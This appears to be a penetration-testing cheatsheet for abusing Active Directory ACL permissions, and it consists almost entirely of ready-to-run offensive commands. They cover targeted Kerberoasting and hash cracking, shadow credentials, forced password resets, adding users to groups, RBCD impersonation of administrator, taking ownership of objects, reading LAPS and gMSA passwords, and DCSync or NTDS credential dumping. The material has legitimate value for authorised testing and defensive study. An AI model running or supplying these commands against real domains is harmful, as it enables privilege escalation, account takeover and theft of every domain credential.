AD ACLs Cheatsheet
GenericWrite on User
Targeted Kerberoasting
targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
john <hash_file> --wordlist=rockyou.txt
ShadowCredentials
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
Using Kerberos
certipy shadow auto -username username@domain -k -account target_user -dc-ip ip
GenericALL
Change Password
bloodyAD --host dc -d domain -u username -p password set password target new_password
net rpc password 'username' 'new_password' -U 'domain'/'username'%'hash' -S 'dc' --pw-nt-hash
net rpc password 'username' 'new_password' -U 'domain'/'username'%'password' -S 'dc'
Add user to a group
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD --host dc -d domain -u username -p password add groupMember target_group target_username
RBCD
impacket-rbcd -delegate-from machine_name -delegate-to target -dc-ip ip -action write 'domain/username:password'
impacket-getST -spn 'cifs/dc' -impersonate administrator -dc-ip ip 'domain/machine_name:password'
export KRB5CCNAME=administrator.ccache
GenericALL on OU
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal username -target-dn 'OU_DN' domain/username:password
ForceChangePassword
net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>
bloodyAD --host dc -d domain -u username -p password set password target_username new_password
python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>
nxc smb domain -u username -p password -M change-password -o USER='target_username' NEWPASS='new_password'
AddMember
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD --host dc -d domain -u username -p password add groupMember target_group user_to_add
AddSelf
bloodyAD --host dc -d domain -u username -p password add groupMember target_group username
WriteOwner
impacket-owneredit -action write -new-owner username -target target domain/username:password
impacket-dacledit -action 'write' -rights 'FullControl' -principal username -target-dn dn 'domain/username:password'
or
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal username -target-dn dn 'domain/username:password'
bloodyAD --host dc -d domain -u username -p password add groupMember target_group username
WriteSPN
bloodyAD --host dc -d domain -u username -p password set object target servicePrincipalName -v 'domain/meow'
impacket-GetUserSPNs domain/username:password -dc-ip ip -request
or
targetedKerberoast -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
AddKeyCredentialLink
pywhisker.py -d domain --dc-ip ip -u username -p password --target target --action add
gettgtpkinit.py -cert-pfx file.pfx -pfx-pass pfx_password domain/target ticket.ccache -dc-ip ip
getnthash.py domain/target -k key -dc-ip ip
or
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
ReadLAPSPassword
nxc smb target -u username -p password --laps
ReadGMSAPassword
nxc ldap target -u username -p password --gmsa
DCSync
impacket-secretsdump domain/username:password@domain
impacket-secretsdump domain/username@domain -hashes :hash
impacket-secretsdump dc -k
nxc smb target -u username -p password --ntds
nxc smb target --use-kcache --ntds
Resources
- https://www.thehacker.recipes/ad/movement/dacl/
- https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse
- https://mayfly277.github.io/posts/GOADv2-pwning-part11/
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
This post is licensed under CC BY 4.0 by the author.
